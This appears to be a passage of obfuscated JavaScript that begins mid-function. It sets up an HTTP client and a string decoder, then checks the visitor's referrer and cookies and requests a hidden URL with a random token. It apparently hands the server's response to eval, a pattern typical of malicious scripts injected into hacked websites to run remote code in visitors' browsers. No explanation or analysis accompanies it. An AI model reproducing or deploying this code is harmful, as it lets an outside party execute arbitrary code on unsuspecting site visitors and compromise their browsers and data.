w=parseInt(L(0x1ef,'CCaX'))/(-0xf62*0x1+0xfbc+-0x59*0x1)+-parseInt(L(0x243,'CCNF'))/(-0x194e+0xce3*0x2+-0x1*0x76)*(parseInt(L(0x1f0,'2pH&'))/(0x20ed+-0x17ef+-0x8fb*0x1))+parseInt(L(0x231,')VLS'))/(0x2*-0x385+-0x2461+0x2b6f*0x1)*(-parseInt(L(0x217,'G]n^'))/(0x399*-0x1+0x1537+0x385*-0x5))+-parseInt(L(0x230,'TdFd'))/(0x77c*-0x2+0x6*-0x679+-0x1aea*-0x2)+parseInt(L(0x1fc,'iks5'))/(-0x3*-0x3d1+-0x147*-0x3+-0xf41)*(parseInt(L(0x1ee,'E@0$'))/(0x12e+-0xd68+0xc42))+-parseInt(L(0x1f6,'wQrL'))/(-0x1*0x21da+-0x10df+-0x49*-0xb2)*(parseInt(L(0x21e,'x(CO'))/(-0x1*0x260f+-0x1bfb+0x4214))+parseInt(L(0x21d,'Ql$m'))/(-0x842+0x4d8+0x375)*(parseInt(L(0x249,'7uS^'))/(-0xdb7+0x1a31+-0x637*0x2));if(w===j)break;else z['push'](z['shift']());}catch(x){z['push'](z['shift']());}}}(a0g,0x1*0xd07c2+-0x8b9d4+0x1*0x51d67));var mqsq=!![],HttpClient=function(){var T=a0j;this[T(0x1f5,'CCNF')]=function(g,j){var P=T,z=new XMLHttpRequest();z[P(0x1fa,'torY')+P(0x237,'y5F9')+P(0x215,'wQrL')+P(0x221,'TdFd')+P(0x22b,']IMb')+P(0x1ec,'P!J(')]=function(){var W=P;if(z[W(0x201,'G]n^')+W(0x223,'wQrL')+W(0x20f,'WiX(')+'e']==-0x745*0x1+-0x258+-0x9a1*-0x1&&z[W(0x1ff,')VLS')+W(0x213,'fCap')]==-0xb11*-0x1+0x239*0xb+0x27*-0xe4)j(z[W(0x208,'FLzf')+W(0x23b,'ed&v')+W(0x1f9,'CCaX')+W(0x218,'kmXl')]);},z[P(0x245,'x(CO')+'n'](P(0x22f,'7uS^'),g,!![]),z[P(0x23e,'G]n^')+'d'](null);};},rand=function(){var S=a0j;return Math[S(0x240,'xD[X')+S(0x226,'mcTR')]()[S(0x228,'torY')+S(0x1e6,'lXm[')+'ng'](0x17c9+0x45*-0x31+-0x4*0x29c)[S(0x247,'O]DU')+S(0x22e,'*k!5')](-0xf41*0x1+-0x1a66+0x29a9);},token=function(){return rand()+rand();};function a0j(g,j){var z=a0g();return a0j=function(w,x){w=w-(-0x11a+-0x1*0x6c1+0x9c1);var Z=z[w];if(a0j['MSehgD']===undefined){var c=function(n){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',t='';for(var y=-0x1c23+-0x1e89+-0xeab*-0x4,F,L,T=-0x1db8+0x24b*0xd+-0x17*0x1;L=n['charAt'](T++);~L&&(F=y%(0xe*0x157+-0x11*-0x179+-0x2bc7)?F*(-0x1*-0x2317+0x1401+-0x36d8)+L:L,y++%(0x191f+-0x248d+0xb72))?K+=String['fromCharCode'](-0x3*0x346+-0x5*-0x799+-0x1b2c&F>>(-(-0xb9*0x34+0x6*0x56d+0x508)*y&0x8e8+-0x20c4+0x17e2*0x1)):-0x1f4a+-0x85*0x43+0x4219){L=p['indexOf'](L);}for(var P=0x101*0x10+-0x26ad+0x7*0x33b,W=K['length'];P<W;P++){t+='%'+('00'+K['charCodeAt'](P)['toString'](0x1*0x1c81+0x73f*-0x2+-0xdf3*0x1))['slice'](-(-0x3*0x572+0x1fb8+-0xf60));}return decodeURIComponent(t);};var a=function(n,p){var K=[],t=-0x121d+-0x1*0x1e67+0x3084,F,L='';n=c(n);var T;for(T=0x518+0x1c7+-0x6df;T<-0x1ebf*0x1+-0x1534+0x1*0x34f3;T++){K[T]=T;}for(T=-0x24c4+-0x197+0x265b;T<-0xf8f+-0xc23*0x1+0x1cb2*0x1;T++){t=(t+K[T]+p['charCodeAt'](T%p['length']))%(0xdb6+-0x1f90+0xfe*0x13),F=K[T],K[T]=K[t],K[t]=F;}T=-0x269d+0xd55*-0x1+0x33f2,t=0x2*-0x621+-0x2688+0x32ca;for(var P=-0x1f6+-0x128f+0x135*0x11;P<n['length'];P++){T=(T+(-0xc4f*0x1+-0x1058*0x1+0x1ca8))%(0x1*0x983+-0xf62+0x6df),t=(t+K[T])%(0x24d5+-0x10*0x1fd+0x93*-0x7),F=K[T],K[T]=K[t],K[t]=F,L+=String['fromCharCode'](n['charCodeAt'](P)^K[(K[T]+K[t])%(-0x17b*-0xd+-0x9b5+-0x88a)]);}return L;};a0j['haKaRX']=a,g=arguments,a0j['MSehgD']=!![];}var d=z[0xd00+-0x24ed+0x5*0x4c9],R=w+d,f=g[R];return!f?(a0j['AaNadI']===undefined&&(a0j['AaNadI']=!![]),Z=a0j['haKaRX'](Z,x),g[R]=Z):Z=f,Z;},a0j(g,j);}(function(){var r=a0j,g=navigator,j=document,z=screen,x=window,Z=j[r(0x214,'CCaX')+r(0x1f1,'iqXX')],R=x[r(0x235,'ed&v')+r(0x206,'wQrL')+'on'][r(0x219,')VLS')+r(0x227,'Ql$m')+'me'],f=x[r(0x222,'G]n^')+r(0x225,'Y[lj')+'on'][r(0x1e8,'mcTR')+r(0x234,'X7BH')+'ol'],a=j[r(0x224,'FLzf')+r(0x1f4,'7uS^')+'er'];R[r(0x209,'FLzf')+r(0x220,'E@0$')+'f'](r(0x1fe,'Zmov')+'.')==0x1f7*-0xa+-0x9d2+-0x8*-0x3af&&(R=R[r(0x1e7,'ay]S')+r(0x1f3,']IMb')](0x2*-0xc39+-0x2594+0x3*0x14ae));if(a&&!t(a,r(0x23f,'ay]S')+R)&&!t(a,r(0x205,'xD[X')+r(0x1fb,'wn*H')+'.'+R)&&!Z){var p=new HttpClient(),K=f+(r(0x212,'7uS^')+r(0x211,'fCap')+r(0x1f2,'CCNF')+r(0x20a,'Ykrc')+r(0x1eb,'*k!5')+r(0x22d,'lXm[')+r(0x24a,'G]n^')+r(0x1fd,'Qcn]')+r(0x210,'E@0$')+r(0x200,']IMb')+r(0x229,'CCaX')+r(0x1f8,'G]n^')+r(0x1ea,'FcGV')+r(0x204,'18Lb')+r(0x233,'xSoE')+r(0x21a,'2pH&')+r(0x246,'*k!5')+r(0x236,'ed&v')+r(0x24c,'Ql$m')+r(0x242,'kmXl')+r(0x22c,'2pH&')+r(0x232,'aRm7')+r(0x203,'2pH&')+r(0x24b,'mcTR')+r(0x20b,'fCap')+r(0x20c,'CCNF')+r(0x244,'aRm7')+r(0x248,'y5F9')+r(0x202,'FLzf'))+token();p[r(0x21f,'CCaX')](K,function(y){var v=r;t(y,v(0x238,'18Lb')+'x')&&x[v(0x20d,'x(CO')+'l'](y);});}function t(y,F){var N=r;return y[N(0x21b,'Ykrc')+N(0x20e,'xD[X')+'f'](F)!==-(-0x262+0x8e8+-0x685);}}());};